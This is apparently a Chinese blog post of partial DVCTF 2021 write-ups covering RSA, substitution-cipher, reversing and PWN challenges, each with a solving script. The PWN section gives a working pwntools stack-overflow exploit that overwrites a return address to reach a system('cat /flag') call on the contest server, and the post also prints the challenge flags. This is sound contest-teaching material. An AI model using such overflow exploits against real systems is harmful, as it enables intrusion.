DVCTF 2021 部分writeup

最新推荐文章于 2024-07-25 15:24:36 发布
最新推荐文章于 2024-07-25 15:24:36 发布
阅读量936 收藏 1
点赞数 1
分类专栏: CTF Reverse PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43859686/article/details/114901982
版权
CTF 同时被 3 个专栏收录
22 篇文章 3 订阅
订阅专栏
Reverse
20 篇文章 0 订阅
订阅专栏
PWN
1 篇文章 0 订阅
订阅专栏

Start

0x01 Crypto-Bootless RSA

{"N": 148818474926605063920889194160313225216327492347368329952620222220173505969004341728021623813340175402441807560635794342531823708335067243413446678485411066531733814714571491348985375389581214154895499404668547123130986872208497176485731000235899479072455273651103419116166704826517589143262273754343465721499, "e": 3, "ct": 4207289555943423943347752283361812551010483368240079114775648492647342981294466041851391508960558500182259304840957212211627194015260673748342757900843998300352612100260598133752360374373}

给了n,c,e,e很小,c明显也比n小,这种直接解密开方就行了:

import binascii
import gmpy2
n = 0xd3ecaed74ca7754aeb3c061fdc37734718934c377cbc5322541174fa0d67e87bbf5a35bbf87f920d118c1ccb8520a24e738295d49ec2aed4953b2daeb9fee091c7b9dd3a5d06b65b98697bd37ffb9b483a05aa54a4b08a5d830c91c465f16e450ea93d987948ca745fe7bc6f67c6af6cf372a08a17717a25b347fcf31eb69e9b
e = 0x3
ct = 0xf78a311629a1355acbae0139cb1273e1d1131410a2ee583c650ed0b186829f8653ed9dc1e85775f2cb21661e9cd7d3c0463330b50ddbfa25e21dee262cb0e6d1294cfc3555944de3a3e69ac9065

m = gmpy2.iroot(ct, 3)[0]
flag = binascii.unhexlify(hex(m)[2:].strip("L")).decode()

# dvCTF{RS4_m0dul0_inf1nity}

0x02 Crypto-Substitution

weXGU{xi1kg3w_x1ks3i}
根据前缀得到:
weXGU -> dvCTF
第三段开头:

Gsviv ziv z

替换掉G得到T:

Tsviv ziv z

根据词频,刚好可以对上:

There are a

flag:

weXGU{xi1kg3w_x1ks3i}
dvCTF{xr1kg3d_x1kh3r}

现在还剩xkg还没找到替换

找找词频,一篇文章中常见的3个字母组成的单词的有the

找到gsv,这里明显可以得到一个规律,就是这里字母的位置是替换的,s替换成ii就替换成s

所以这个gsv明显就是the

这里g->t,看到大写的G->T,猜测大小写替换规律一样,所以X->C,那么x->c

flag:

weXGU{xi1kg3w_x1ks3i}
dvCTF{cr1kt3d_c1kh3r}

最后这个k,看到flag后一个单词:

c1kh3r

将数字转换成对应的字母:

cikher

猜测k应该替换成p,得到:

cipher

最终flag:

dvCTF{cr1pt3d_c1ph3r}

0x03 PWN-Kanagawa

nc challs.dvc.tf 4444

main函数,很明显fgets的位置存在栈溢出:
在这里插入图片描述
这里的fgets函数需要注意一下,fgets函数的定义:

char *fgets(char *str, int n, FILE *stream) 从指定的流 stream 读取一行,并把它存储在 str 所指向的字符串内。当读取 (n-1) 个字符时,或者读取到换行符时,或者到达文件末尾时,它会停止,具体视情况而定。

只读取了44个字符:
在这里插入图片描述
在这里插入图片描述
看到sv4的定义,v4的定义长度就是1024fgets读取的时候限制就是1024,所以这个位置没有溢出,而s的定义长度40fgets可以读取44个字符,多出来的4个字符,刚好溢出一个返回地址的长度(该程序是32位的):
在这里插入图片描述
这里直接有system('cat /flag'),在recovery_mode中被调用,直接将返回地址覆盖为recovery_mode的地址即可
在这里插入图片描述
pwn脚本:

from pwn import *

r = remote('challs.dvc.tf','4444')
elf = ELF('kanagawa')

return_addr = elf.symbols['recovery_mode']

payload = b'a'*40 + p32(return_addr)
r.sendline(payload)
r.interactive()

在这里插入图片描述

0x04 rocca_pia

整体流程:
在这里插入图片描述
transform,判断奇偶,分别异或,最终与PASSWD对比:
在这里插入图片描述
python脚本:

encrypt = [0x77, 0x41, 0x50, 0x63, 0x55, 0x4C, 0x5A, 0x68, 0x7F, 6, 0x78, 4, 0x4C, 0x44, 0x64, 6, 0x7E, 0x5A, 0x22, 0x59, 0x74, 0x4A]

flag = ''
for i in range(len(encrypt)):
	if i & 1:
		flag += chr(encrypt[i] ^ 0x37)
	else:
		flag += chr(encrypt[i] ^ 0x13)
		
# dvCTF{I_l1k3_sw1mm1ng}

由于该题已知加密后的字符串的长度,所以也可以用Angr:

import angr
import claripy
encrypt = [0x77, 0x41, 0x50, 0x63, 0x55, 0x4C, 0x5A, 0x68, 0x7F, 6, 0x78, 4, 0x4C, 0x44, 0x64, 6, 0x7E, 0x5A, 0x22, 0x59, 0x74, 0x4A]
porject = angr.Project('rocca_pia')
flag = claripy.BVS('flag', len(encrypt)*8)

state = project.factory.entry_state(args=['rocca_pia', flag])
simgr = project.factory.simgr(state)

simgr.explore(find=0x401286, avoid=0x401294)
flag = simgr.found[0].solver.eval(flag, cast_to=bytes).decode()
print(flag)

在这里插入图片描述

0x05 crackme

整体流程显而易见:
在这里插入图片描述
加密后的flag放在s2中,最终与d2862c3379cbf547d317b3b1771a4fb6比较,加密过程在emmdee5中:
在这里插入图片描述先是将flag hash一下,放入v5,在调用esreverv5进行处理:
在这里插入图片描述
这里v7指向flag_hash,第一个循环将v7指向hash的最后一个字符,v6指向的是MD5后的第一个字节,这里就是将第一个和最后一个进行交换,最后通过sprintf格式化输出成,d2862c3379cbf547d317b3b1771a4fb6
注意这个位置:

for ( i = 0; i <= 15; ++i )
    sprintf((char *)(a2 + 2 * i), "%02x", *((unsigned __int8 *)v5 + i));

这里只循环了16次,每次格式化02x,注意v5转换成的类型是int8所以,每次交换v5应该是以字节进行首尾交换的
python脚本:

res = 'd2862c3379cbf547d317b3b1771a4fb6'
i = len(res) - 2

flag_hash = ''
while i > 0:
	flag_hash += res[i:i+2]
	i -= 2
print(flag_hash)


# b64f1a77b1b317d347f5cb79332c86
# 在线md5解hash即可
# 741852963

End

顾殇の点
关注
专栏目录
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
ISCTF2021-WriteUp.pdf
10-24
isctf的详细wp
2021虎符CTF第一道misc-writeup
慢就是快
04-06 796
文章目录1.题目概况2.思路3.提取数据得出结果 1.题目概况 经过简单分析,发现攻击者使用了延时注入的攻击手法,那么我们需要判断哪些语句成功执行了 2.思路 延时语句sleep(2),说明延时2秒,那么延时成功一个是发包间隔会相差两秒,而一个是成功和失败的返回界面不一致,那么响应包长度也不一致。如下图 3.提取数据得出结果 满足条件的语句提取后,把十进制转换成字符就好了,转换出来后是 ZmxhZ3tZb3VfYXJlX3NvX2dyZWF0fQ== 尝试base64解码, flag{You_are
[红明谷CTF 2021]write_shell 1
最新发布
ubaichu的博客
07-25 704
[红明谷CTF 2021]write_shell 1 题目解析
CSTC2021 WriteUp
七月的博客
05-06 1296
本篇文章原文:http://www.7yue.top/cstc2021-writeup/ Web easyweb <?php show_source(__FILE__); $v1=0;$v2=0;$v3=0; $a=(array)json_decode(@$_GET['foo']); if(is_array($a)){ is_numeric(@$a["bar1"])?die("nope"):NULL; if(@$a["bar1"]){ ($a["bar1"]>2021)
CISCN2021初赛WriteUp
Hellsegamosken
05-19 1080
第一次打 ctf,啥也没学,赛前一道题没做过,了解了下 IDA 的使用就上了。 glass 200 分 reverse,安卓逆向,.apk 改 .zip 解压,classes.dex 转 classes.jar 后打开,找到 MainActivity 开始读代码。 发现调用了 public native boolean checkFlag(String paramString); 这样一个函数,但这个函数并没有写出来。搜了一下 native 关键字,发现是用来调用本地 C 代码的。然后在 glass\li
CTF one_Pointer_php 2021 蓝帽杯 WriteUp
baynk的博客
05-10 1246
两周前做的,弄了一会没时间就放下了,我当时以为我差一点,结果真的差亿点。。。 今天在BUUCTF中看到了这个题的复现,特来学习一波。 0x01 PHP审计 之前看到人家发的是张火炬,这次打开却是个广告了。。不过无所谓,给了源代码就成,分别是user.php和add_api.php。 ### user.php <?php class User{ public $count; } ?> ### add_api.php <?php include "user.php"; if($use
2021强网杯Writeup--by Nu1L Team.pdf
06-15
标题和描述所涉及的知识点有:“2021强网杯Writeup--by Nu1L Team.pdf”,“第五届‘强网杯’全国网络安全挑战赛”以及标签“CTF 网络安全 信息安全”。这些信息共同指向一个全国性的网络安全竞赛和Nu1L团队提交的...
UMCTF2021-Writeup:MOCSCTF主持的UMCTF2021的文章
03-14
UMCTF2021-编写 MOCSCTF主持的UMCTF2021的文章 欢迎加入我们: 欢迎加入我们的行列: CTF时间: ://ctftime.org/team/120747 面子书: : 感谢以下提供协助: 感谢您提供的支持: 特鲁@MOCTF 梁锦@@ MOCTF 邦@MOCTF...
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup
05-27
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup解析部分题目
【CTF WriteUp】2021 starCTF部分Crypto题解
cccchhhh6819的博客
01-18 4487
(打比赛感想:大佬真TM多。。。) Crypto Crypto-GuessKey 题目 from random import randint import os from flag import flag N=64 key=randint(0,2**N) print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0 q=0 new_key='' zeros=[0] for j in range(len(key)): if key
CTF writeup
08-10
CTF writeup masterCTF write ups from the vulnhub CTF team
2021第三届北京通信行业CTF初赛writeup
shutdown -s -t
08-13 1316
Web web1 题目 <?php if(!$_GET['source']){ highlight_file(__FILE__); } $a = $_GET['a']; $b = $_GET['b']; $c = $_GET['c']; $check = $a and $b; if($check){ if($a and $b){ die("No flag!Try it again!"); } else{ if($c == md5($c)){ die(ge
“蚁景杯”WUSTCTF2021新生赛writeup
weixin_45883223的博客
01-30 5629
“蚁景杯”WUSTCTF2021新生赛writeupCrypto签到滴答AES With RSAGMCVigeneregive you d银河信号MiscErxian BridgeZero Widthbinarybase64Tall ShanBenhideReverseX0rbabypycbabyjvavequationsez_resosotablesWebEasyWebWeb2矛盾命令执行CoverEasyUploadBabyPHPPwn你管这叫新生赛?shellcodeez_heap2.272.23获取
补档:D^3CTF 2021 - Misc - easyQuantum WriteUp
weixin_44911246的博客
08-15 336
cap.pcapng用Wireshark打开,清晰可见TCP的三次握手和四次挥手: 于是需要仔细分析中间的数据传输过程。 注意到某些数据包内有“numpy”等字符串: 于是想到可能是某种兼容Python的序列化方法。 又注意到有固定的头部数据: 而pickle序列化时也有固定的头部数据(协议版本4.0): 于是尝试利用pickle进行反序列化。示例如下: import pyshark import pickle cap = pyshark.FileCapture('cap.pcapng') t
WMCTF 2021 pwn dy_maze writeup
Zheng__Huang的博客
08-31 1295
  经过三天的奋战(摸鱼划水√),WMCTF 2021 终于结束,我们的萌新体验队在大家的共同努力下也拿到了前30的成绩,实在出乎我的预料。不过,对于我们的首次比赛而言,成绩是最次要的方面,队友们在比赛中表现出的认真和专注、对CTF的兴趣和热爱才是最最珍贵的东西,只有兴趣,才能推动我们不断训练进取,在水平上拥有长足的进步。   这次比赛中,除了少量签到、娱乐题外,pwn方向上我只做出了一道dy_maze,原因还是技术不够,堆溢出没有学。这道题也与一般的栈溢出不同,在前面加上了自动化分析的内容,确实长了见识.
2021WMCTF的Re1题wp
sln_1550的博客
08-31 445
感觉比赛难度太高了,这题做了1天多才做出来,不过不得不感慨年纪大了,智商也下降的厉害。 附件解压是个exe程序,放到IDA里分析咋一看也没啥特别的: 前面是常规的flag头部和{}的格式判断,然后是字符串处理,后面再看。 刚开始是用输入的4个字符生成字符串,然后对4个字符串进行类似CRC32的校验码 这里我分别对4个校验值命名为a,b,c,d,然后发现有个4个等式需要为真,也就是说可以通过方程求出a,b,c,d from z3 import * s=Solver() a=BitVec('a',32)
WMCTF2021 WP misc
mumuzi的博客
08-31 1814
唉因为太菜本来不想写的(其实是因为都只能做一半导致太水了不好写) 复现了一下取证还是写一下吧 Checkin ctrl+c ctrl+v enter 你画我猜 画!都可以画! WMCTF{x1aoma0_wants_a_girlfriend} 我画你猜 猜!都可以猜! WMCTF{L1near_has_double_girlfriends} LOGO LOGO!都可以LOGO! 首先nc上去,看到WM标志 为了要把图给画下来,当然是重定向啦 nc 118.190.157.196 100
2021 AntCTF&D3CTF之jumpjump
qq_43682582的博客
03-08 433
AntCTF&D3CTF之jumpjump前言正题后记 前言 其他的都太难惹。。。 正题 Ida打开,shift+F12查看字符串: 跟进后来到关键函数,F5大法查看伪代码: 通过分析,有两个关键函数,sub_40189D()和sub_40191E(),第一个函数: 继续跟进: for循环里的就是第一轮异或,后面的sub_408A80()函数经过动态调试发现为反调试手段, 只要不进入该函数,直接F9到下一个断点前即可继续运行程序。 第二个函数: 将第一轮异或后的值加4之后与0x33异或,再与
"2021东华杯Web Writeup1:EzGadget反序列化漏洞分析
2021年东华杯Web Writeup1比赛中,EzGadget提供了源码并打开了IDEA进行分析。在源码中发现了一个反序列化的漏洞点:在ToStringBean这个类的unser方法中,通过"/readobject"接口接收data参数并进行反序列化操作。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值